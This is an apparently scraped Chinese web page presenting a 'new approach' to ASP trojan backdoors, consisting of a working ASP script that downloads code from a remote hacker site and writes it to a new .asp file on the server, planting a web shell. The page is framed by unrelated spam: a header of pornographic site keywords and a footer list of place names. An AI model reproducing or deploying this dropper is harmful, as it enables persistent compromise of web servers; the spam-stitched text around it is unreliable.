最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

ASP木馬后門新思路

 更新時間:2007年01月16日 00:00:00   作者:  
<%  
Function GetPage(url)  
dim Retrieval  
Set Retrieval = createObject("Microsoft.XMLHTTP")  
With Retrieval  
.Open "Get", url, False ', "", ""  
.Send  
GetPage = BytesToBstr(.ResponseBody)  
End With  
Set Retrieval = Nothing  
End Function  

Function BytesToBstr(body)  
dim objstream  
set objstream = Server.createObject("adodb.stream")  
objstream.Type = 1  
objstream.Mode =3  
objstream.Open  
objstream.Write body  
objstream.Position = 0  
objstream.Type = 2  
objstream.Charset = "GB2312"  
BytesToBstr = objstream.ReadText  
objstream.Close  
set objstream = nothing  
End Function  
on error resume next  
Url="http://www.heibai.org/hacker/daemon.txt"  
response.write "開始取得遠(yuǎn)程代碼........"  
wstr = GetPage(Url)  

Set fs=Server.createObject("Scripting.FileSystemObject")  

Set CrFi=fs.createTextFile(server.MapPath("./")&"\test.asp")  
Crfi.Writeline(wstr)  
set CrFi=nothing  
set fs=nothing  
response.write "...<font color=red>生成test.asp文件成功</font>"  
%>  

相關(guān)文章

最新評論

临沂市| 龙里县| 民县| 芮城县| 财经| 东兴市| 崇义县| 屯留县| 鲁甸县| 临江市| 巫山县| 建阳市| 潜江市| 清水县| 建瓯市| 蓝山县| 吉木萨尔县| 长丰县| 百色市| 陆良县| 清徐县| 鹤山市| 宜宾市| 旬阳县| 博客| 招远市| 吉安市| 福州市| 德州市| 灌阳县| 广丰县| 本溪市| 皋兰县| 梧州市| 冀州市| 卓尼县| 大田县| 友谊县| 镇康县| 北安市| 潍坊市|